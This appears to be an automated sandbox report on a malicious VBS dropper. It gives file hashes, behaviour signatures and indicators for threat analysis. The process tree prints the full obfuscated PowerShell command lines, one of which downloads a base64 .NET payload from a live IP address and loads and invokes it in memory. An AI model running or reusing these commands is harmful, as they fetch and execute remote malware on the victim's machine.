Windows 7 deprecation

Windows 7 will be removed from tria.ge on 2025-03-31

Overview

overview

10

Static

static

1

5b30c27eac...12.vbs

windows7-x64

10

5b30c27eac...12.vbs

windows10-2004-x64

10

Analysis

  • max time kernel
    119s
  • max time network
    120s
  • platform
    windows7_x64
  • resource
    win7-20240903-en
  • resource tags

    arch:x64arch:x86image:win7-20240903-enlocale:en-usos:windows7-x64system
  • submitted
    02/10/2024, 01:17

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    5b30c27eaca00c51aa594df7273f8e24d84d08a6c085147697e21b082e3e7812.vbs

  • Size

    1.9MB

  • MD5

    640864bd8dcc33f7191cea6e8794a386

  • SHA1

    6b651ed9e576d72b6c53e975e555572701fe2681

  • SHA256

    5b30c27eaca00c51aa594df7273f8e24d84d08a6c085147697e21b082e3e7812

  • SHA512

    ac0b98a599ae60043b4d652d7f2826f26918ae6eb2f99f2dec7c14b34d74bea25264da0962eef619e1c72f67d181c4a1c1d52a71a5d7e734869a18300805cc11

  • SSDEEP

    3072:BiiiiiiiiiiiiiiiiiiiiUiiiiiiiiiiiiiiiiiiiihiiiiiiiiiiiiiiiiiiiij:8

Score
10/10
execution

Malware Config

Extracted

Language
ps1
Deobfuscated
URLs
ps1.dropper

http://91.202.233.169/Tak/Reg/Marz/DRG/RTC/F3dll.txt

Signatures

  • Blocklisted process makes network request 1 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs

    Using powershell.exe command.

    execution
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Suspicious behavior: EnumeratesProcesses 2 IoCs
  • Suspicious use of AdjustPrivilegeToken 2 IoCs
  • Suspicious use of WriteProcessMemory 6 IoCs

Processes

  • C:\Windows\System32\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\5b30c27eaca00c51aa594df7273f8e24d84d08a6c085147697e21b082e3e7812.vbs"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:1972
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $ExeNy = 'J▒Bx▒Gs▒dgB3▒HI▒I▒▒9▒C▒▒Jw▒w▒Cc▒Ow▒k▒Gk▒YQBx▒HU▒Yw▒g▒D0▒I▒▒n▒CU▒c▒B6▒EE▒YwBP▒Gc▒SQBu▒E0▒cg▒l▒Cc▒OwBb▒EI▒eQB0▒GU▒WwBd▒F0▒I▒▒k▒Hk▒dwBq▒GQ▒a▒▒g▒D0▒I▒Bb▒HM▒eQBz▒HQ▒ZQBt▒C4▒QwBv▒G4▒dgBl▒HI▒d▒Bd▒Do▒OgBG▒HI▒bwBt▒EI▒YQBz▒GU▒Ng▒0▒FM▒d▒By▒Gk▒bgBn▒Cg▒I▒▒o▒E4▒ZQB3▒C0▒TwBi▒Go▒ZQBj▒HQ▒I▒BO▒GU▒d▒▒u▒Fc▒ZQBi▒EM▒b▒Bp▒GU▒bgB0▒Ck▒LgBE▒G8▒dwBu▒Gw▒bwBh▒GQ▒UwB0▒HI▒aQBu▒Gc▒K▒▒n▒Gg▒d▒B0▒H▒▒Og▒v▒C8▒OQ▒x▒C4▒Mg▒w▒DI▒Lg▒y▒DM▒Mw▒u▒DE▒Ng▒5▒C8▒V▒Bh▒Gs▒LwBS▒GU▒Zw▒v▒E0▒YQBy▒Ho▒LwBE▒FI▒Rw▒v▒FI▒V▒BD▒C8▒Rg▒z▒GQ▒b▒Bs▒C4▒d▒B4▒HQ▒Jw▒p▒Ck▒OwBb▒HM▒eQBz▒HQ▒ZQBt▒C4▒QQBw▒H▒▒R▒Bv▒G0▒YQBp▒G4▒XQ▒6▒Do▒QwB1▒HI▒cgBl▒G4▒d▒BE▒G8▒bQBh▒Gk▒bg▒u▒Ew▒bwBh▒GQ▒K▒▒k▒Hk▒dwBq▒GQ▒a▒▒p▒C4▒RwBl▒HQ▒V▒B5▒H▒▒ZQ▒o▒Cc▒QwBs▒GE▒cwBz▒Ew▒aQBi▒HI▒YQBy▒Hk▒MQ▒u▒EM▒b▒Bh▒HM▒cw▒x▒Cc▒KQ▒u▒Ec▒ZQB0▒E0▒ZQB0▒Gg▒bwBk▒Cg▒JwBa▒Hg▒SwBI▒Ec▒Jw▒p▒C4▒SQBu▒HY▒bwBr▒GU▒K▒▒k▒G4▒dQBs▒Gw▒L▒▒g▒Fs▒bwBi▒Go▒ZQBj▒HQ▒WwBd▒F0▒I▒▒o▒Cc▒d▒B4▒HQ▒Lg▒x▒Eo▒R▒▒v▒FM▒VgBO▒EU▒LwB6▒HI▒YQBN▒C8▒ZwBl▒FI▒LwBr▒GE▒V▒▒v▒Dk▒Ng▒x▒C4▒Mw▒z▒DI▒Lg▒y▒D▒▒Mg▒u▒DE▒OQ▒v▒C8▒OgBw▒HQ▒d▒Bo▒Cc▒I▒▒s▒C▒▒J▒Bp▒GE▒cQB1▒GM▒I▒▒s▒C▒▒JwBS▒Gc▒dgB1▒Ec▒Jw▒s▒C▒▒J▒Bx▒Gs▒dgB3▒HI▒L▒▒g▒Cc▒MQ▒n▒Cw▒I▒▒n▒FI▒bwBk▒GE▒Jw▒g▒Ck▒KQ▒7▒▒==';$KByHL = [system.Text.Encoding]::Unicode.GetString( [system.Convert]::FromBase64String( $ExeNy.replace('▒','A') ) );$KByHL = $KByHL.replace('%pzAcOgInMr%', 'C:\Users\Admin\AppData\Local\Temp\5b30c27eaca00c51aa594df7273f8e24d84d08a6c085147697e21b082e3e7812.vbs');powershell $KByHL;
      2⤵
      • Command and Scripting Interpreter: PowerShell
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:2124
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$qkvwr = '0';$iaquc = 'C:\Users\Admin\AppData\Local\Temp\5b30c27eaca00c51aa594df7273f8e24d84d08a6c085147697e21b082e3e7812.vbs';[Byte[]] $ywjdh = [system.Convert]::FromBase64String( (New-Object Net.WebClient).DownloadString('http://91.202.233.169/Tak/Reg/Marz/DRG/RTC/F3dll.txt'));[system.AppDomain]::CurrentDomain.Load($ywjdh).GetType('ClassLibrary1.Class1').GetMethod('ZxKHG').Invoke($null, [object[]] ('txt.1JD/SVNE/zraM/geR/kaT/961.332.202.19//:ptth' , $iaquc , 'RgvuG', $qkvwr, '1', 'Roda' ));"
        3⤵
        • Blocklisted process makes network request
        • Command and Scripting Interpreter: PowerShell
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:1932

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
    Filesize

    7KB

    MD5

    f620c4c6d36f02fac14da696770026e0

    SHA1

    816aabf4a5799e289e0faaac13200ec032385297

    SHA256

    b066b18ca7afd64e569a8a5f14d1d7f251103a183ce91d4c4952d5087c86aee6

    SHA512

    2d5fc3bc1c10d33ea9b40980de7ba705c06125ad4087ece0a96448bf2ad8150ccb112f7907df5de2837395ab6fedf36c521c416d2abfbc2b0109cd873555bbd1

    Download Submit

  • memory/1932-16-0x0000000002B10000-0x0000000002B18000-memory.dmp

    Filesize

    32KB

    Download

  • memory/2124-4-0x000007FEF5BDE000-0x000007FEF5BDF000-memory.dmp

    Filesize

    4KB

    Download

  • memory/2124-5-0x000000001B540000-0x000000001B822000-memory.dmp

    Filesize

    2.9MB

    Download

  • memory/2124-6-0x0000000001ED0000-0x0000000001ED8000-memory.dmp

    Filesize

    32KB

    Download

  • memory/2124-7-0x000007FEF5920000-0x000007FEF62BD000-memory.dmp

    Filesize

    9.6MB

    Download

  • memory/2124-8-0x000007FEF5920000-0x000007FEF62BD000-memory.dmp

    Filesize

    9.6MB

    Download

  • memory/2124-9-0x000007FEF5920000-0x000007FEF62BD000-memory.dmp

    Filesize

    9.6MB

    Download

  • memory/2124-10-0x000007FEF5920000-0x000007FEF62BD000-memory.dmp

    Filesize

    9.6MB

    Download

  • memory/2124-17-0x000007FEF5920000-0x000007FEF62BD000-memory.dmp

    Filesize

    9.6MB

    Download